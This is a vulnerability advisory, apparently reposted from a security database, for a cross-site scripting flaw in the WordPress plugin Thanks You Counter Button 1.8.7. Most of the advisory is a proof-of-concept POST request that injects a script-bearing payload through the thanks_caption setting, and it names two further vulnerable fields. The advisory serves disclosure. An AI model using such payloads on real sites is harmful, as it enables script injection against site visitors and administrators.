WordPress Thanks You Counter Button 1.8.7 Cross Site Scripting

2014.02.26
Credit: HauntIT
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

# ============================================================== # Title ...| Thanks You Counter Button XSS # Version .| thanks-you-counter-button 1.8.7 # Date ....| 23.02.2014 # Found ...| HauntIT Blog # Home ....| http://www.wordpress.org/plugins/ # ============================================================== # ============================================================== # XSS ---<request>--- POST /k/wordpress/wp-admin/options.php HTTP/1.1 Host: 10.149.14.62 (...) Content-Length: 806 option_page=thankyoubutton-options&action=update&_wpnonce=ed03a9f018&_wp_http_referer=%2Fk%2Fwordpress%2Fwp-admin%2Foptions-general.php%3Fpage%3Dthankyou.php&thanks_display_page=1&thanks_display_home=1&thanks_position_firstpageonly=1&thanks_position_lastpageonly=1&thanks_caption='%3e"%3e%3cbody%2fonload%3dalert(9999)%3e&thanks_style=float%3A+left%3B+margin-right%3A+10px%3B&thanks_caption_style=font-family%3A+Verdana%2C+Arial%2C+Sans-Serif%3B+font-size%3A+14px%3B+font-weight%3A+normal%3B&thanks_caption_color=%23ffffff&thanks_size=large&thanks_form=rounded&thanks_color=blue&thanks_custom_url=&thanks_custom_glow_url=&thanks_custom_width=100&thanks_custom_height=26&thanks_check_ip_address=1&thanks_time_limit%5B%5D=1&thanks_time_limit_seconds=60&thanks_display_settings_shortcuts=1&submit=Save+Changes ---<request>--- [+] Also vulnerable are: thanks_caption_style, thanks_style # ============================================================== # More @ http://HauntIT.blogspot.com # Thanks! ;) # o/


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top